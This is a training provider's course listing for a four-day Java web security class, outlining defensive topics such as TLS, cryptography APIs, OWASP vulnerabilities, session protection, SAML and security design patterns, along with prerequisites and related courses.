Java Web Security

Course:   JWSEC
Duration:   4 Days
Level:   II
On our website at:   http://www.verhoef-training.com/courses/JWSEC.html
 
Course Summary

This course will illustrate how to ensure your web applications are deployed with the most advanced security measures for coding, communication and configuration. The class begins by discussing threats and mitigation techniques, application of security design principles, conventional and public key cryptography, and the most popular authentication protocols, including SSL and TLS, encryption and hashing, OWASP utilization, SQL injection, cross-site scripting, web service security vulnerabilities, session hijacking, AJAX issues, SOAP message protection, security flaw detection and review of security design patterns.

Topics Covered In This Course

IT Security Status

  • Security basics
    • Confidentiality
    • Integrity
    • Authentication/Authorization
    • Non-repudiation
  • Cryptographic roles
    • Key management
    • Trust models
    • Revocation
    • Random generation
  • Application flaws and threat modeling
  • Security realities
  • Security threat layers
    • Hub and Spoke
    • Perimeter
    • Identity
    • Hardware
    • OS
  • Security patterns
  • Services security

Security Patterns

  • Best practices
  • Review patterns catalog
  • Pattern design methodology
  • Tier patterns
    • Services
    • Identity
    • Provisioning
    • Personal

Communication Security

  • SSL architecture
  • SSL alert protocols
  • SSL threats
  • Use of TLS
  • Security certificates
    • Digital certificates
    • CA utilization
    • Distribution
    • Revocation

Application Server Security

  • HTTP restrictions
  • HTTPS utilization
  • Security API
    • Hashing algorithms
    • Cryptographic API
    • JCE API
    • JSSE
    • JAAS
  • Certificate management
  • Encryption techniques
    • Symmetric vs Asymmetric
    • Block cipher
    • Cipher Block
  • Session authentication
    • Hijacking prevention
    • Request forgery
    • Vulnerabilities
    • Session fixation issue
    • Timeout issues
    • Encryption threat mitigation

Web Application Security

  • Role-based granularity
  • Use of OWASP
  • OWASP vulnerabilities
    • Injection flaws
    • Authentication and Sessions
    • Cross-site scripting
    • Direct object references
    • Sensitive data
    • Access granularity
    • Invalidated redirects
  • Application role security
    • Client tier
    • EJB tier
    • Component tier
  • Error handling
    • Standardized error management
    • Request faults
    • Page faults

AJAX Management

  • AJAX components
  • Asynchronous issues
  • Vulnerabilities
    • Javascript
    • SQL injection
    • Bridging
    • XSS
  • Vulnerability testing

Web Services Security

  • Architecture
  • Core issues
    • Threats
    • Vulnerabilities
    • Risks
  • Security requirements
    • Authentication
    • Integrity
    • Traceability
    • Confidentiality
    • Non-repudiation
    • Interoperability
  • XML encryption
  • XML Key management
  • WS-Security

Identity Management

  • Core issues
  • SAML overview
  • SAML Architecture
    • Assertions
    • Domain model
    • Policy enforcement
    • Request-Reply model
    • Attribute assertion
    • XML signatures

Application Scanning

  • Application threat analysis
    • SQL injection
    • XSS
    • Command execution
    • Server configuration
    • Directory traversal
  • Use of tools
    • Commercial
    • Software-as-a-Service
    • Open Source

Security Design Patterns

  • Web-tier
    • Authentication
    • Enforcers
    • Validators
    • Proxy
    • Interceptors
  • Business-tier
    • Container managed
    • Obfuscation
    • Delegator
    • Facade
    • Service management
  • Web Service tier
    • Network layer stack
      • Perimeter defense
      • XML firewall
    • Transport layer stack
      • Infrastructure
      • Identity provider
      • Directory services
    • Message layer stack
      • Interceptor
      • Secure router
      • Gateway
What You Can Expect

Upon conclusion, each participant will have acquired these skills:

Who Should Take This Course

This course is designed for Java developers, system designs and project managers that rs that seek to design, create and implement secure applications.

Recommended Prerequisites

You should be familiar with the basics of the web system architecture including processes, class loading, and threads. Some programming experience on the Java platform is preferable.

Training Style

Lecture/Lab

Related Courses
Code Course Title Duration Level
WSST
Web Software and Security Testing
3 Days
I
Details
WSSEC
Web Services Security Considerations in Java
1 Day
II
Details
NETSEC
Planning and Managing Network Security
5 Days
II
Details

Every student attending a Verhoef Training class will receive a certificate good for $100 toward their next public class taken within a year.

You can also buy "Verhoef Vouchers" to get a discounted rate for a single student in any of our public or web-based classes. Contact your account manager or our sales office for details.